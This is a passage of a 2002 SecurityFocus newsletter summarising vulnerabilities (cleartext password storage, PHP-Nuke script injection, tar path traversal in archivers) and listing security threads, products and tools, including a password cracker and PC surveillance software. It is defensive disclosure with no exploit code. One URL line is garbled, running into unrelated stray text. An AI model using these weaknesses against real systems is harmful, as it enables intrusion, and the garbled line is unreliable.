BugTraq ID: 6396
Remote: No
Date Published: Dec 16 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6396
Summary:
Cypherix Cryptainer is data encryption software designed for use with
Microsoft Windows operating systems.
A vulnerability has been reported for Cryptainer that may allow attackers
to obtain access to the passwords used by Cryptainer. The vulnerability
exists due to the way Cryptainer stores the user-supplied password to
access the program. Specifically, Cryptainer stores the password in memory
in clear text.
This vulnerability can only be exploited when Cryptainer is loaded and the
victim user has entered the password at least once. However, Cryptainer
contains a feature that allows the program to be minimized in the System
Tray. This satisfies one condition of exploitation and may provide local
attackers with a greater chance for exploitation.
By exploiting this issue a malicious local user may be able to retrieve
sensitive information from a system using Cryptainer and may lead to
compromise of computing resources.
29. PHP-Nuke Web Mail Script Injection Vulnerability
BugTraq ID: 6400
Remote: Yes
Date Published: Dec 16 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6400
Summary:
PHP-Nuke is a web-based portal system. Implemented in PHP, it is available
for a range of systems, including Unix, Linux, and Microsoft Windows.
A vulnerability has been discovered in the web mail module available for
PHP-Nuke. Due to insufficient sanitization of message content it is
possible for an attacker to embed script code into a malicious HTML email.
An unsuspecting user that opens the email will cause the script code to be
executed within their browser.
Exploiting this issue may allow an attacker to steal cookie-based
authentication credentials, which may be used at a later time to hijack a
user's web session.
30. PHP-Nuke Multiple Path Disclosure Vulnerabilities
BugTraq ID: 6406
Remote: Yes
Date Published: Dec 16 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6406
Summary:
PHP-Nuke is a web based Portal system. Implemented in PHP, it is available
for a range of systems, including Unix, Linux, and Microsoft Windows.
Multiple path disclosure vulnerabilities have been discovered in PHP
scripts used by PHP-Nuke. The issue occurs when a request is made for a
script, which should not be accessed directly. Some scripts do not provide
sufficient error handling for cases where these scripts are accessed
directly. This will cause the script to generate an error page containing
the absolute path information. The PHP scripts affected by this issue
include voteinclude.php, navbar.php, attachment.php, and mainfile.php.
Exploiting this issue will cause the target server to disclose sensitive
information about the layout of the filesystem of the host running the
vulnerable software. Information of this nature may aid in mounting
further attacks against the host.
31. ZipMagic Tar Hostile Destination Path Vulnerability
BugTraq ID: 6416
Remote: Yes
Date Published: Dec 17 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6416
Summary:
ZipMagic is a file compression utility available from Aladdin Systems. It
is available for the Microsoft Windows operating system.
A vulnerability has been discovered in Aladdin Systems ZipMagic when
handling malicious .tar archives. The problem lies in the handling of
pathnames.
By specifying a path for an archived item which points outside the
expected directory scope, the creator of the archive can cause the file to
be extracted to arbitrary locations on the filesystem. An attacker may
take advantage of this vulnerability to cause malicious files to be placed
anywhere on a target filesystem.
An attacker may exploit this condition by specifying a relative extraction
path in a malicious .tar that points to sensitive or criticals files, such
as system binaries.
This vulnerability was originally described in BID 6412 "Multiple Vendor
Archiving Software Tar Hostile Destination Path Vulnerability" and is now
being assigned an individual Bugtraq ID.
32. WinZip Tar Hostile Destination Path Vulnerability
BugTraq ID: 6418
Remote: Yes
Date Published: Dec 17 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6418
Summary:
WinZip is an archiving utility for Microsoft Windows platforms.
WinZip is prone to a security vulnerability when unpacking .tar archives.
The problem is in the handling of pathnames.
By specifying a path for an archived item which points outside the
expected directory scope, the creator of the archive can cause the file to
be extracted to arbitrary locations on the filesystem. An attacker may
take advantage of this vulnerability to cause malicious files to be placed
anywhere on a target filesystem.
This issue is present when the "Extract folder names" option is checked in
the extraction dialogue, which is the default setting and is used to
retain the directory structure when extracting files. An attacker may
exploit this condition by specifying a relative extraction path in a
malicious .tar that points to sensitive or critical files, such as system
binaries.
This vulnerability was originally described in BID 6412 "Multiple Vendor
Archiving Software Tar Hostile Destination Path Vulnerability" and is now
being assigned an individual Bugtraq ID.
33. WinRAR Archive Improper File Representation Weakness
BugTraq ID: 6422
Remote: Yes
Date Published: Dec 17 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6422
Summary:
WinRAR is a compression utility capable of reading and writing files using
ZIP, RAR, CAB, ARJ, LZH, TAR, GZ, ACE, UUE, BZ2, JAR, and ISO archives. It
is available for the Microsoft Windows Operating system.
WinRAR contains a weakness when displaying the directory traversal
sequence '../' to the user when contained in .tar archives. Instead of
displaying the '../' sequence, the user interface will display '..'.
This could allow a user viewing a .tar archive to believe that the
extraction path information contained in the archive is legitimate and can
be redistributed to other users.
Passing along such an archive could allow another user to be exploited if
their archive extraction utility is vulnerable to the Multiple Vendor
Archiving Software Tar Hostile Destination Path Vulnerability (BID 6412).
This issue was originally mentioned in BID 6412 and is now being assigned
an individual Bugtraq ID.
III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Removing locking user from CTRL-ALT-DEL window - NT 4.0 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/304088
2. Logging Terminal Services Access? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/304089
3. ipsecpol on Windows 2000 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/304087
4. SecurityFocus Microsoft Newsletter #117 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/303553
5. Users Peeved at Microsoft Security Effort (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/303529
6. IIS 4 Security (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/303338
7. Exchange 5.5 delivery receipts (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/303328
8. Bulletin MS02-069 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/303278
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. ipPulse
by Northwest Performance Software
Platforms: Windows 95/98, Windows NT
Relevant URL:
http://www.ippulse.com/ippulsemain.html
Summary:
ipPulse is a Remote Status Monitoring Tool. Use ipPulse to monitor the
up/down status of IP connected devices (nodes) on any IP connected
network. ipPulse uses a variety of methods, including SNMP, to poll and
check the network connectivity of a list of user-defined nodes. ipPulse
alerts you to failures using a variety of techniques ranging from audible
messages to email and pager notification. You can even control ipPulse
remotely by logging into Remote Control using any Telnet application.
2. BVRP Mail Warden
by BVRP Software UK
Platforms: Windows 2000, Windows NT
Relevant URL:
http://shop.bvrp.com/english/asp/default.asp?UserPrefLanguage=1&UserPrefCountry=3&UserPrefCurrency=4&UserPrefCurrentCompany=18&UserPrefUseVicom=1 the permissions that new files
# are set to when they are created. If the archives will be madQuestion: Buffer Overrun in Microsoft Data Access Components Coul d Lead to Code Execution (Q329414)
Summary:
BVRP Mail Warden provides vital email protection for your business against
unwanted, dangerous or inappropriate email messages flowing in and out of
your organisation.
3. Silent Watch
by Adavi
Platforms: Windows 95/98, Windows NT
Relevant URL:
http://www.adavi.com/overview.cfm
Summary:
Desktop PC Surveillance software, monitor display, keylogs, URL logs and
define keyword dictionary to trigger alarms and monitor hundreds of PC's
remotely. Freeze PC's, block keyword trapped email and file transfers.
V. NEW TOOLS FOR MICROSOFT PLATFORMS
-------------------------------------
1. Lepton's Crack v1.0.1
by Lepton and Nekromancer lcrack@eudoramail.com
Relevant URL:
http://usuarios.lycos.es/reinob/
Platforms: Linux, POSIX, Windows 2000, Windows NT
Summary:
Lepton's Crack is a generic password cracker. It is easily-customizable
with a simple plugin system and allows system administrators to review the
quality of the passwords being used on their systems. It can perform a
dictionary-based (wordlist) attack as well as a brute force (incremental)
password scan. It supports standard MD4 hash, standard MD5 hash, NT
MD4/Unicode, and Lotus Domino HTTP password (R4) formats.
2. perltrash v0.3
by Maik Schreiber
Relevant URL:
http://www.iq-computing.de/perltrash
Platforms: Os Independent
Summary:
perltrash is a Perl script that emulates a "trash can". Instead of
permanently deleting files, they are moved into the trash can. Files can
be restored in the future if they are needed again. Single files can be
permanently removed from the trash can. perltrash can automatically remove
files from the trash can that are over a certain time limit or trash can
size. It supports all kinds of files, including complete directories.
3. Opticon|Users 2002
by Security Storm
Relevant URL:
http://www.securitystorm.net/products/tools/opticon/index.asp
Platforms: Windows 2000, Windows NT, Windows XP
Summary:
Opticon|Users 2002 is a simple tool to show administrators who is logged
onto the network and from what workstation that user is accessing the
network from. Information about the workstation used to logon from, the
domain, the logon server, and the date/time of logon is also displayed.
This tool makes it easy to spot unauthorized logons from a certain
workstation or logons using an administrative account.
VI. SPONSOR INFORMATION
-----------------------
This issue is sponsored by: Qualys
Strengthening Network Security: FREE Guide Network security is a
constantly moving target - even proven solutions lose their punch over
time. Find out how to get COMPLETE PROTECTION against ever-growing
security threats with our FREE new Guide.
Get your copy today at: https://www.qualys.com/forms/nsguideh_376.php
-------------------------------------------------------------------------------
- Next message: Rich Wilson: "Re: ipsecpol on Windows 2000"
- Previous message: Hayes, Bill: "RE: Blank passwords, TsInternetUser added to Administrators"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
